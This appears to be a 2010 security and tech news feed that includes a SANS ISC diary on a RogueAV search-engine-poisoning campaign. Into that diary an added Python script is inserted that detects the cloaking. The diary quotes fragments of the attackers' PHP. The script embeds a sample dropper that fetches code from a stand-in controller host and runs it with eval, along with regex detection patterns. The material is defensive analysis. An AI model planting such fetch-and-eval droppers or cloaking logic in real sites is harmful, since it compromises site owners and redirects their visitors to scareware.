InfoSec News

Adobe plans to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 (Windows, Macintosh and UNIX), Adobe Acrobat 9.3.3 (Windows and Macintosh), and Adobe Reader 8.2.3 and Acrobat 8.2.3 (Windows and Macintosh), covered in security bulletin APSB10-17. An update for Adobe Flash Player, published in security bulletin APSB10-16, will be released as well.
Affected Software
Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX

Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh

Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris

-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Adobe said today that it would patch a critical Reader vulnerability on Thursday.
 
The word "BlackBerry" used to bring to mind mostly images of bulky, brick-like handhelds and busy executives in tailored suits. Today, BlackBerry smartphones are all over the place, in the hands of teenagers, parents, businessmen and everyone in between. And they come in all shapes and sizes.
 
Symantec and F-Secure issued separate warnings this week that the Android-based Tap Snake game can secretly be used to track the location and movements of users.
 
As it starts transitioning to Microsoft's Bing search engine this week, Yahoo has decided to drop Search Monkey, a developer platform designed to let external coders create applications that enhance Yahoo search results.
 
Researchers at the University of Washington are building the first mobile devices to effectively transmit American Sign Language via compressed video over a 3G cellular network.
 
The Web's standards body gets fonts in order with new standard
 
RIM said that reports that Amazon.com has cut the price of the new Blackberry Torch 9800 are 'inaccurate and misleading.'
 
Intel and Micron announced the delivery of 3-bit-per-cell NAND flash memory on 25-nanometer lithography technology, producing what they called the industry's highest-capacity and smallest NAND device.
 
Oracle appears set to deliver more information than ever before about its long-awaited Fusion Applications at the OpenWorld conference in September, with more than 30 sessions listed as of Tuesday.
 
These pragmatic practices, from Forrester Research, won't break the bank, cause a revolt among application development team members or slow down development processes.
 
The U.S. Department of Justice won't file criminal charges against a Pennsylvania school district accused of spying on students via webcams in their computers.
 
Analysts split today over reports that Apple may be readying a smaller iPad for launch later this year.
 
An antenna expert predicts that a move to add Verizon as an iPhone carrier won't prompt a change in antenna design.
 
With its expected acquisition of 3Par, Dell is positioning itself to compete against top data center storage providers, including IBM, HP, Hitachi and even Dell partner EMC.
 
Several analysts said Amazon.com's decision to price the new BlackBerry Torch 9800 smartphone at $100, half that listed by carrier AT&T, doesn't necessarily indicate that the device is on a path to failure.
 
When it comes to cloud-based e-mail, there are four major vendors vying for your IT dollars: Microsoft, Google, IBM and Cisco. Each has its pros and cons, but no matter which vendor you choose the price of e-mail will be roughly the same: $5 per user per month.
 
Barnes & Noble today released free Nook e-reader software for the iPhone and the iPod Touch, along with updates to Nook for the iPad.
 
The U.S. is reviewing whether a law that increases some visa fees is compliant with World Trade Organization (WTO) rules, the U.S. Department of State said on Monday. The move follows strong criticism of the law from outsourcers and the Indian government.
 
Source code analysis vendor Fortify Software will eventually be integrated into HP's Business Technology Optimization application portfolio. Analysts say the acquisition was expected.

 
Steve Jobs called Adobe lazy but why hasn't Apple fixed iTunes
 
 
Amazon Web Services has introduced Reserved Database Instances, a new way to pay for its cloud-based Relational Database Service (RDS), the company said on Monday.
 
Hewlett-Packard said on Tuesday it will buy Fortify Software, which makes tools to find software vulnerabilities and compliance software, for an undisclosed amount.
 
Sometimes you just need a basic laptop that won't hurt your wallet or your back. Toshiba's Satellite L645D-S4036 ($550 as of August 16, 2010) strives to fulfill that role. But while all low-cost laptops make some compromises, the L645D sacrifices some usability to achieve its target price.
 
Like a new car that plummets in value once you drive it off the dealer's lot, electronics are worth less the moment you slip them out of the box. The bad news is, there's nothing you can do about tech depreciation.
 
We all know perimeter firewalls are necessary but not sufficient. But what's the right strategy for building additional layers of security? Greg Machler dives in.
 
A majority of security software suites still fail to detect attacks on PCs even after the style of attack has been known for some time, underscoring how cybercriminals still have the upper hand.
 
In some cases, you can get rid of your laptop -- but only after figuring out app, data-access, keyboard, display, and power issues
 
Court papers filed by the federal government and Apple against a former manager detail a scheme that allegedly saw confidential Apple data supplied to Asian electronics companies over more than three years in return for kickbacks of more than $1 million.
 
Some industry watchers have speculated that HTML 5 could strike down Adobe's Flash as the Web media delivery format of choice. But Flash will likely stick around. Here's why.
 
After a long, difficult job search, it can be tempting to jump at the first opportunity you're offered. But before you accept, you'd better have the answers to these questions -- or you could find yourself back on the hunt before you know it.
 
Research In Motion (RIM) has offered India some access to BlackBerry instant messages, according to media reports citing government officials.
 
InfoSec News: TOORCON 12 CALL FOR PAPERS: http://sandiego.toorcon.org/
TOORCON 12 CALL FOR PAPERS
It's that time of year again! ToorCon 12 is coming so get your code finished and submit a talk this time around. We're letting you decide if you want to be a part of our 50-minute talks on Saturday, 20-minute [...]
 
InfoSec News: Hackers steal customer data by accessing supermarket database: http://www.japantoday.com/category/crime/view/hackers-steal-customer-data-by-accessing-supermarket-database
Kyodo News August 15, 2010
OSAKA -- Hackers stole customer data from eight online supermarkets in Japan, including Uny Co. and Neo Beat Co, in July using a hacking [...]
 
InfoSec News: Inside Verizon's Insider Threat Data: http://www.darkreading.com/insiderthreat/security/attacks/showArticle.jhtml?articleID=226700346
By Robert Lemos Contributing Writer DarkReading Aug 16, 2010
For security firms that argue malicious insiders are a greater threat than outside attackers, the latest Verizon Data Breach Investigations Report seems like vindication: The proportion of incidents with an insider agent doubled to 48 percent, while attacks with an external hacker dropped to 70 percent. Incidents involving data theft from the outside still account for the majority of attacks -- with insiders catching up.
The driving factor behind the increase in insider attacks was not the economic downturn -- an oft-argued opinion -- but rather the inclusion of a new data set in Verizon's database, says Alex Hutton, principal of research and intelligence for Verizon Business. The U.S. Secret Service joined much of its caseload data to Verizon's database, adding a large number of incidents where the victim had a better idea of the identity of the attacker and believed the person could be prosecuted. Both factors tend to favor incidents with an insider component. "With the Secret Service [cases], we got exposed to a whole new set of data," Hutton says of the report.
Overall, Verizon still sees external attackers as the major threat, however. When an outsider steals data, he absconds with a massive number of records. In 2009, breaches caused by outside criminals accounted for about 139 million stolen records, while insiders accounted for only 2.6 million records. "A record that has been exposed is 70 times more likely to have been exposed by an external source than an internal source," Hutton says.
Verizon doesn't refute the threat of insiders -- just the assertion that insiders pose the greatest risk. Companies should have defenses that work against insiders, outsiders, and partners, Hutton says. Identity and access management are essential controls that companies need to block -- or at least, slow down -- attackers.
[...]
 
InfoSec News: Passwords Quickly Hacked With PC Graphics Cards: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=226700303
By Mathew J. Schwartz InformationWeek August 16, 2010
Passwords with fewer than 12 characters can be quickly brute-force decoded using a PC graphics processing unit (GPU) that costs just a few [...]
 
InfoSec News: Hackers: 'ColdFusion bug more serious than Adobe says': http://www.theregister.co.uk/2010/08/16/adobe_coldfusion_vuln/
By Dan Goodin in San Francisco The Register 16th August 2010
A recently patched vulnerability in Adobe's ColdFusion application server may be more serious than previously thought following the public [...]
 
Court papers filed by the U.S. Government and Apple against a former manager detail a scheme that allegedly saw confidential Apple data supplied to Asian electronics companies over more than three years in return for kickbacks of more than US$1 million.
 
In June and July I posted two diaries (http://isc.sans.edu/diary.html?storyid=9085 and http://isc.sans.edu/diary.html?storyid=9103) in which I analyzed one campaign used by the RogueAV guys and various scripts they utilize. Last week Dancho Danchev posted a blog about mass compromises of .NL and .CH sites that are utilized in yet another RogueAV campaign (http://ddanchev.blogspot.com/2010/08/dissecting-scareware-serving-black-hat.html).
This campaign is different from the one I described in the two diaries above; judging by the code it is probably a totally different group, although some of the functionality is the same. In the previous campaign the attackers infected all PHP files on compromised sites, while here they only used one PHP script. So let's dig into it and see what they do and how.
The first step in this campaign was to compromise as many web sites as possible; in many cases we were looking at mass compromises where a server hosting hundreds of web sites was compromised. The attackers planted one file (usually called page.php or wp-page.php) on every web site; they didn't change anything else.
The page.php script does the majority of the work. Similarly to the one I described in June, this script actually just asks the main controller what to do when it receives a request. The request sent to the controller is interesting: it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to constantly change how any script behaves.
This master script, in a nutshell, does this:
First it checks if the request to the page.php script contains the r= parameter. If it doesn't (meaning you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.
Now, if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content is returned (more about this below). If you visit the script directly (no referrer) it again displays a 404 error. Finally, if the referrer is set to Google, Yahoo or Bing (meaning the user clicked on a search result), the browser is redirected to a third site (and possibly a fourth) that displays the infamous RogueAV warnings.
Above is the standard modus operandi of the RogueAV guys; you can notice that this is almost exactly the same as the campaign I analyzed back in June, although the scripts are completely different.
The most interesting part happens when a Google, Yahoo or Bing bot visits the web page. Since this visit is actually the bot crawling the content, the script has to return the correct content to poison the search engine (otherwise it would not be related to the search terms the attackers use).
So, in order to return relevant content, the master script does the following:
First it queries Bing by using the same keyword that was used by the crawler. You can see that part of the script below:

You can see above how they nicely create the query and ask for 50 results. These results are parsed by the script and saved.
Now comes the interesting part: they get the main (index.html) page on the compromised web site with the following code line:

$index_html = file_get_contents(http://
The retrieved index.html file will be used to serve back to the bot. First the attackers remove any JavaScript from the file. After this, they change the title of the web page:

$index_html = preg_replace('~<title[^>]*>(.*?)</title>~is', '<title>' . htmlspecialchars(ucwords($keyword)) . ' - $1</title>', $index_html);
This will expand the old title with the keywords that they used to poison the search engine. The following pictures show the original HTML document (the real index.html) and the modified one (blacked out the title to protect the compromised web page). Notice how they added the keywords at the beginning of the title tag (and one extra blank line):
Original index.html:

Modified index.html:

Now they retrieve 100 links to other compromised web sites from the controller and insert these links, as well as results retrieved from Bing into the final index.html page. This page is then returned to the bot.
Such content clearly works much better when poisoning search engines than the one I described back in June; yesterday I checked Google and I was able to find thousands of poisoned results pointing to such compromised web sites. While the search engine operators do a lot of work to prevent poisoning like this, it is clear that the bad guys are not resting either and that they are developing new poisoning techniques constantly.
--

Bojan

INFIGO IS (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
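The diary above describes two things a site owner or incident responder can look for: a dropped PHP file that fetches code from a controller and eval()s it, branching on search-engine user agents and referrers and faking a 404 for direct visits; and a crawler view of the page whose title has keywords prepended and which carries hundreds of injected links to other compromised sites. The following added example (not code from the ISC diary or from the campaign itself) implements both checks in Python: a static indicator scan over PHP sources and a comparison of the page as a normal visitor sees it against the page as a crawler sees it. All PHP snippets, HTML pages, host names and indicator thresholds below are constructed for illustration.

```python
"""Defender-side checks for the SEO-poisoning cloaking described in the diary.

Added example, not part of the original post. The PHP snippets, HTML pages
and host names are constructed for illustration, not real compromised content.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Static indicators drawn from the diary's description of page.php/wp-page.php:
# remote code fetched and eval()ed, search-bot user-agent branching,
# search-engine referrer branching, and a faked 404 for direct requests.
INDICATORS = {
    "remote_code_eval": re.compile(
        r"eval\s*\(\s*(?:file_get_contents|curl_exec|gzinflate|base64_decode)", re.I),
    "remote_fetch": re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I),
    "bot_user_agent_check": re.compile(
        r"HTTP_USER_AGENT.{0,120}(googlebot|slurp|bingbot|msnbot)", re.I | re.S),
    "search_referrer_check": re.compile(
        r"HTTP_REFERER.{0,120}(google|yahoo|bing)\.", re.I | re.S),
    "fake_404": re.compile(r"header\s*\(\s*['\"]HTTP/1\.[01] 404", re.I),
}

# File names the diary reports the dropper usually uses.
SUSPICIOUS_NAMES = {"page.php", "wp-page.php"}


def scan_php_source(src):
    """Return the sorted names of cloaking indicators present in one PHP file."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def triage_files(files):
    """files: {path: source}. Flag a file when it shows at least two indicators,
    or at least one indicator under a known dropper name (threshold is an assumption)."""
    hits = {}
    for path, src in files.items():
        found = scan_php_source(src)
        name = path.rsplit("/", 1)[-1].lower()
        if len(found) >= 2 or (found and name in SUSPICIOUS_NAMES):
            hits[path] = found
    return hits


class _PageInfo(HTMLParser):
    """Collect the <title> text and the set of hosts linked from a page."""

    def __init__(self):
        super().__init__()
        self.title, self.in_title, self.hosts = "", False, set()

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "a":
            host = urlparse(dict(attrs).get("href", "")).netloc
            if host:
                self.hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

    def handle_data(self, data):
        if self.in_title:
            self.title += data


def page_info(html):
    p = _PageInfo()
    p.feed(html)
    return p.title.strip(), p.hosts


def compare_views(visitor_html, crawler_html, site_host, max_new_hosts=5):
    """Compare the page served to a normal visitor with the page served to a crawler.
    Returns a list of findings; an empty list means the two views are consistent."""
    v_title, v_hosts = page_info(visitor_html)
    c_title, c_hosts = page_info(crawler_html)
    findings = []
    # The diary's rewrite yields '<keywords> - <original title>'.
    suffix = " - " + v_title
    if v_title and c_title != v_title and c_title.endswith(suffix):
        findings.append("title_prefixed:" + c_title[: -len(suffix)])
    # Links to many hosts that only the crawler sees suggest injected cross-links.
    new_hosts = {h for h in c_hosts - v_hosts if h != site_host.lower()}
    if len(new_hosts) > max_new_hosts:
        findings.append(f"external_links_injected:{len(new_hosts)}")
    return findings


# Constructed samples (hypothetical hosts; .invalid/.example are reserved names).
SAMPLE_DROPPER = r'''<?php
if (!isset($_GET['r'])) { header("HTTP/1.0 404 Not Found"); exit; }
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($ua, 'googlebot') !== false || strpos($ua, 'slurp') !== false) {
  eval(file_get_contents('http://controller.invalid/task.php?r=' . $_GET['r']));
}
$ref = $_SERVER['HTTP_REFERER'];
if (stripos($ref, 'google.') !== false) { /* redirect to landing page */ }
'''
SAMPLE_BENIGN = r'''<?php
$feed = file_get_contents('https://example.com/feed.xml');
echo htmlspecialchars($feed);
'''
VISITOR_HTML = ("<html><head><title>Example Bakery</title></head><body>"
                "<a href='/menu'>Menu</a><a href='http://partner.example/'>P</a></body></html>")
CRAWLER_HTML = ("<html><head><title>Free Screensavers - Example Bakery</title></head><body>"
                + "".join(f"<a href='http://site{i}.example/page.php?r=x'>k</a>" for i in range(100))
                + "<a href='http://partner.example/'>P</a></body></html>")

if __name__ == "__main__":
    print(triage_files({"site/wp-page.php": SAMPLE_DROPPER, "site/feed.php": SAMPLE_BENIGN}))
    print(compare_views(VISITOR_HTML, CRAWLER_HTML, "bakery.example"))
```

The static scan is deliberately indicator based rather than signature based, since the diary notes that the dropper's real logic is fetched from the controller at request time and can change at will; a single remote fetch (as in the benign feed reader) is not flagged on its own. The view comparison needs the two responses to be fetched with a crawler user agent and a browser user agent respectively, which the caller supplies.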
 
Apple is readying another tablet similar to the iPad but with a 7-inch touchscreen for launch as early as the end of this year, according to a major Taiwanese newspaper.
 
IBM has strengthened its hand in the Unix business with new systems based on its Power7 processors, including a server for large enterprises that scales to 256 cores.
 

Posted by InfoSec News on Aug 17

http://sandiego.toorcon.org/

TOORCON 12 CALL FOR PAPERS

It's that time of year again! ToorCon 12 is coming so get your code
finished and submit a talk this time around. We're letting you decide if
you want to be a part of our 50-minute talks on Saturday, 20-minute
talks on Sunday, and 75-minute talks for our Deep Knowledge Seminars on
Friday depending on how much time you need to present your new ideas and
techniques. We evaluate our...
 

Posted by InfoSec News on Aug 17

http://www.japantoday.com/category/crime/view/hackers-steal-customer-data-by-accessing-supermarket-database

Kyodo News
August 15, 2010

OSAKA -- Hackers stole customer data from eight online supermarkets in
Japan, including Uny Co. and Neo Beat Co, in July using a hacking
technique called SQL injection to access their databases, sources
familiar with the matter said Saturday.

A source close to Neo Beat, which also operates the websites of...
 

Posted by InfoSec News on Aug 17

http://www.darkreading.com/insiderthreat/security/attacks/showArticle.jhtml?articleID=226700346

By Robert Lemos
Contributing Writer
DarkReading
Aug 16, 2010

For security firms that argue malicious insiders are a greater threat
than outside attackers, the latest Verizon Data Breach Investigations
Report seems like vindication: The proportion of incidents with an
insider agent doubled to 48 percent, while attacks with an external
hacker...
 

Posted by InfoSec News on Aug 17

http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=226700303

By Mathew J. Schwartz
InformationWeek
August 16, 2010

Passwords with fewer than 12 characters can be quickly brute-force
decoded using a PC graphics processing unit (GPU) that costs just a few
hundred dollars, according to researchers at the Georgia Institute of
Technology.

"We've been using a commonly available graphics processor to test...
 

Posted by InfoSec News on Aug 17

http://www.theregister.co.uk/2010/08/16/adobe_coldfusion_vuln/

By Dan Goodin in San Francisco
The Register
16th August 2010

A recently patched vulnerability in Adobe's ColdFusion application
server may be more serious than previously thought following the public
release of exploit code and blog posts claiming it can be used to take
full control of systems running the software.

In a bulletin published last week, Adobe rated the directory...
 
